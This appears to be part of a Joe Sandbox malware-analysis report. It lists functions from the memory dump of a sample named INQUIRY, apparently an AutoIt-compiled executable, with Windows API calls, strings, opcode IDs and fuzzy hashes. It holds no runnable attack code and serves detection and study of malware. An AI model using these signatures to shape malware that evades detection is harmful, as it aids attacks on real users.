                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                              • API String ID: 2910397461-517079104
                                                                                              • Opcode ID: 300a27eb4d97e07e6c4cd4c5d93c7a121ecbd70d04971f3e492c9ee98586624f
                                                                                              • Instruction ID: ef5230cd106d28b1d6e8e7549591a1ac059d5dedb2b3a4b59b7cdab5ab433da0
                                                                                              • Opcode Fuzzy Hash: 300a27eb4d97e07e6c4cd4c5d93c7a121ecbd70d04971f3e492c9ee98586624f
                                                                                              • Instruction Fuzzy Hash: 95A14C71A40619BFEB14DBA4DD4AFAE7BB9EB08710F104215FA15E72E0DA70AD01CB64
                                                                                              Function 00A7AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00A7AD1E
                                                                                              • GetDriveTypeW.KERNEL32(?,00A9FAC0,?,\\.\,00A9F910), ref: 00A7ADFB
                                                                                              • SetErrorMode.KERNEL32(00000000,00A9FAC0,?,\\.\,00A9F910), ref: 00A7AF59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode$DriveType
                                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                              • API String ID: 2907320926-4222207086
                                                                                              • Opcode ID: 2818e878e6dc8c4228d5a4aa7729cacb65cceeca95ac6bb2a4b64355ce3270e8
                                                                                              • Instruction ID: c1873587078e65120e6a016162b4e48527a1350aaf1e7ceb1568945ebbddd839
                                                                                              • Opcode Fuzzy Hash: 2818e878e6dc8c4228d5a4aa7729cacb65cceeca95ac6bb2a4b64355ce3270e8
                                                                                              • Instruction Fuzzy Hash: 1451A1B1649205FB8B14EB10CE92DBE73B1FBA8740722C85BE40BA72D1DA359D41DB47
                                                                                              Function 00A168DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                              • API String ID: 1038674560-86951937
                                                                                              • Opcode ID: 9f771d30d1bbfb72235338491c5b8219b9b0c54fa7e5cd7d201ee22c9d731c78
                                                                                              • Instruction ID: 223b36717db1b714db452ac853f0b013b88f25e291dd13573afadf7f3e9bf2fc
                                                                                              • Opcode Fuzzy Hash: 9f771d30d1bbfb72235338491c5b8219b9b0c54fa7e5cd7d201ee22c9d731c78
                                                                                              • Instruction Fuzzy Hash: 7C81FDB5640205BBCF21EF60EE42FFE77B8BF05740F044024F845EA192EB61EA95C2A1
                                                                                              Function 00A9A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(00000012), ref: 00A9A903
                                                                                              • SetTextColor.GDI32(?,?), ref: 00A9A907
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A9A91D
                                                                                              • GetSysColor.USER32(0000000F), ref: 00A9A928
                                                                                              • CreateSolidBrush.GDI32(?), ref: 00A9A92D
                                                                                              • GetSysColor.USER32(00000011), ref: 00A9A945
                                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A9A953
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A9A964
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 00A9A96D
                                                                                              • SelectObject.GDI32(?,?), ref: 00A9A97A
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A999
                                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A9A9B0
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A9A9C5
                                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A9A9ED
                                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A9AA14
                                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00A9AA32
                                                                                              • DrawFocusRect.USER32(?,?), ref: 00A9AA3D
                                                                                              • GetSysColor.USER32(00000011), ref: 00A9AA4B
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A9AA53
                                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A9AA67
                                                                                              • SelectObject.GDI32(?,00A9A5FA), ref: 00A9AA7E
                                                                                              • DeleteObject.GDI32(?), ref: 00A9AA89
                                                                                              • SelectObject.GDI32(?,?), ref: 00A9AA8F
                                                                                              • DeleteObject.GDI32(?), ref: 00A9AA94
                                                                                              • SetTextColor.GDI32(?,?), ref: 00A9AA9A
                                                                                              • SetBkColor.GDI32(?,?), ref: 00A9AAA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 1996641542-0
                                                                                              • Opcode ID: 47b14e24e6a5d639f19185cd1205897084392f14b43892df9cc9cf044e3c2a2f
                                                                                              • Instruction ID: d86ec852f96c79f308e786d0a5859dec68d22f297b6c9f6bc5f77d753cced2eb
                                                                                              • Opcode Fuzzy Hash: 47b14e24e6a5d639f19185cd1205897084392f14b43892df9cc9cf044e3c2a2f
                                                                                              • Instruction Fuzzy Hash: 3C511171A00218EFDF11DFA4DC48E9E7BB9FB48320F214626F911EB2A1DB759941DB90
                                                                                              Function 00A989D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A98AC1
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A98AD2
                                                                                              • CharNextW.USER32(0000014E), ref: 00A98B01
                                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A98B42
                                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A98B58
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A98B69
                                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A98B86
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00A98BD8
                                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A98BEE
                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A98C1F
                                                                                              • _memset.LIBCMT ref: 00A98C44
                                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A98C8D
                                                                                              • _memset.LIBCMT ref: 00A98CEC
                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A98D16
                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A98D6E
                                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00A98E1B
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A98E3D
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A98E87
                                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A98EB4
                                                                                              • DrawMenuBar.USER32(?), ref: 00A98EC3
                                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00A98EEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                              • String ID: 0
                                                                                              • API String ID: 1073566785-4108050209
                                                                                              • Opcode ID: 4b67318ae848619fe0928bf0ee83b55b4b8ce5d669b18093215e7e8b6f1f0898
                                                                                              • Instruction ID: 372d82fd13a66692eae97231129aff6ecf15c98e38afdf15d0e62b5e8c4a76d2
                                                                                              • Opcode Fuzzy Hash: 4b67318ae848619fe0928bf0ee83b55b4b8ce5d669b18093215e7e8b6f1f0898
                                                                                              • Instruction Fuzzy Hash: 05E16F75A01218AFDF20DFA4CC84EEE7BB9EF06750F108156F915AA290DF789981DF60
                                                                                              Function 00A9488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCursorPos.USER32(?), ref: 00A949CA
                                                                                              • GetDesktopWindow.USER32 ref: 00A949DF
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A949E6
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A94A48
                                                                                              • DestroyWindow.USER32(?), ref: 00A94A74
                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A94A9D
                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A94ABB
                                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A94AE1
                                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00A94AF6
                                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A94B09
                                                                                              • IsWindowVisible.USER32(?), ref: 00A94B29
                                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A94B44
                                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A94B58
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A94B70
                                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00A94B96
                                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00A94BB0
                                                                                              • CopyRect.USER32(?,?), ref: 00A94BC7
                                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00A94C32
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                              • String ID: ($0$tooltips_class32
                                                                                              • API String ID: 698492251-4156429822
                                                                                              • Opcode ID: 8feedf3adb31c33369b2b336471fa7b4e0eed8de4a6263e13299fa4634993ada
                                                                                              • Instruction ID: 72e0c4b3cc21f71e4ba52c2c55a292174d9dbb765c1ce48b6a14335dc60a4818
                                                                                              • Opcode Fuzzy Hash: 8feedf3adb31c33369b2b336471fa7b4e0eed8de4a6263e13299fa4634993ada
                                                                                              • Instruction Fuzzy Hash: 03B16971608340AFDB04DF65C984B6BBBE4BF88310F00891DF5999B2A1DB71E846CB95
                                                                                              Function 00A127D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A128BC
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00A128C4
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A128EF
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00A128F7
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00A1291C
                                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A12939
                                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A12949
                                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A1297C
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A12990
                                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00A129AE
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A129CA
                                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A129D5
                                                                                                • Part of subcall function 00A12344: GetCursorPos.USER32(?), ref: 00A12357
                                                                                                • Part of subcall function 00A12344: ScreenToClient.USER32(00AD57B0,?), ref: 00A12374
                                                                                                • Part of subcall function 00A12344: GetAsyncKeyState.USER32(00000001), ref: 00A12399
                                                                                                • Part of subcall function 00A12344: GetAsyncKeyState.USER32(00000002), ref: 00A123A7
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00A11256), ref: 00A129FC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                              • String ID: AutoIt v3 GUI
                                                                                              • API String ID: 1458621304-248962490
                                                                                              • Opcode ID: 0f2e275dca620aa29b6a5b1d23e28ba8bc51fff3f349c8722fce05a9e9225479
                                                                                              • Instruction ID: b272aad1032121dbb15e2524e6ec1f0c0c7e9e62fff18f565526912bd3853239
                                                                                              • Opcode Fuzzy Hash: 0f2e275dca620aa29b6a5b1d23e28ba8bc51fff3f349c8722fce05a9e9225479
                                                                                              • Instruction Fuzzy Hash: 70B15B75A0120AEFDB14DFA8DC45BEE7BB4FB48311F10422AFA16E6290DB74D851CB50
                                                                                              Function 00A6A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A6A47A
                                                                                              • __swprintf.LIBCMT ref: 00A6A51B
                                                                                              • _wcscmp.LIBCMT ref: 00A6A52E
                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A6A583
                                                                                              • _wcscmp.LIBCMT ref: 00A6A5BF
                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00A6A5F6
                                                                                              • GetDlgCtrlID.USER32(?), ref: 00A6A648
                                                                                              • GetWindowRect.USER32(?,?), ref: 00A6A67E
                                                                                              • GetParent.USER32(?), ref: 00A6A69C
                                                                                              • ScreenToClient.USER32(00000000), ref: 00A6A6A3
                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00A6A71D
                                                                                              • _wcscmp.LIBCMT ref: 00A6A731
                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00A6A757
                                                                                              • _wcscmp.LIBCMT ref: 00A6A76B
                                                                                                • Part of subcall function 00A3362C: _iswctype.LIBCMT ref: 00A33634
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                              • String ID: %s%u
                                                                                              • API String ID: 3744389584-679674701
                                                                                              • Opcode ID: ac8c008b5b0101ee5ff3dd3cbb5ef5a4ff60133cae81a4dfcd2bebf36fc15ada
                                                                                              • Instruction ID: 783eec5c5b9b47414eefa268944d5e8df9a3ade6b0ea201a5a95e717454f21bc
                                                                                              • Opcode Fuzzy Hash: ac8c008b5b0101ee5ff3dd3cbb5ef5a4ff60133cae81a4dfcd2bebf36fc15ada
                                                                                              • Instruction Fuzzy Hash: 48A1D171204306AFDB14DF64C884BAAB7F8FF54355F108529F99AE2190DB30E956CF92
                                                                                              Function 00A6AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00A6AF18
                                                                                              • _wcscmp.LIBCMT ref: 00A6AF29
                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00A6AF51
                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00A6AF6E
                                                                                              • _wcscmp.LIBCMT ref: 00A6AF8C
                                                                                              • _wcsstr.LIBCMT ref: 00A6AF9D
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A6AFD5
                                                                                              • _wcscmp.LIBCMT ref: 00A6AFE5
                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00A6B00C
                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00A6B055
                                                                                              • _wcscmp.LIBCMT ref: 00A6B065
                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00A6B08D
                                                                                              • GetWindowRect.USER32(00000004,?), ref: 00A6B0F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                              • String ID: @$ThumbnailClass
                                                                                              • API String ID: 1788623398-1539354611
                                                                                              • Opcode ID: ff0903f72e3785f881838a01498991ae63f02439f010239eec7f62826399d128
                                                                                              • Instruction ID: fdb058d5a525f141317cd6d1ed46e9d0c0860e5f4d17acaa2fc4be25a5caf34d
                                                                                              • Opcode Fuzzy Hash: ff0903f72e3785f881838a01498991ae63f02439f010239eec7f62826399d128
                                                                                              • Instruction Fuzzy Hash: B6819D72118205AFDB05DF14C981BAA7BF8EF54314F04856AFD85DA092DB34DD8ACBA2
                                                                                              Function 00A6ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                              • API String ID: 1038674560-1810252412
                                                                                              • Opcode ID: 594b04723074ee370047b35e34c9d57a64ed6dd6053a3cfe207f40f7b308bf14
                                                                                              • Instruction ID: a7b3517266be784fcee3861e5ad5e5c72d90640021cebc76ec8a6312f1915831
                                                                                              • Opcode Fuzzy Hash: 594b04723074ee370047b35e34c9d57a64ed6dd6053a3cfe207f40f7b308bf14
                                                                                              • Instruction Fuzzy Hash: 51313C71A48209BADB14EBA1DF43FEE77B4BB20790F600929F456710D1EF616F448E52
                                                                                              Function 00A84FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00A85013
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00A8501E
                                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00A85029
                                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00A85034
                                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00A8503F
                                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00A8504A
                                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00A85055
                                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00A85060
                                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00A8506B
                                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00A85076
                                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00A85081
                                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00A8508C
                                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00A85097
                                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00A850A2
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00A850AD
                                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00A850B8
                                                                                              • GetCursorInfo.USER32(?), ref: 00A850C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Cursor$Load$Info
                                                                                              • String ID:
                                                                                              • API String ID: 2577412497-0
                                                                                              • Opcode ID: 00d1a8a35a382f6c257bdc6fa782deeb56d630adfbddacbf24168597ecadcadf
                                                                                              • Instruction ID: fbf90e3bd0cfd9787ba1890038790f9d22022aeed4bb854bdf03859d2af20b94
                                                                                              • Opcode Fuzzy Hash: 00d1a8a35a382f6c257bdc6fa782deeb56d630adfbddacbf24168597ecadcadf
                                                                                              • Instruction Fuzzy Hash: 4F31E3B1D483196ADB10AFB68C8999FBFF8FB04750F50452AA54DE7280DA7865018F91
                                                                                              Function 00A9A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
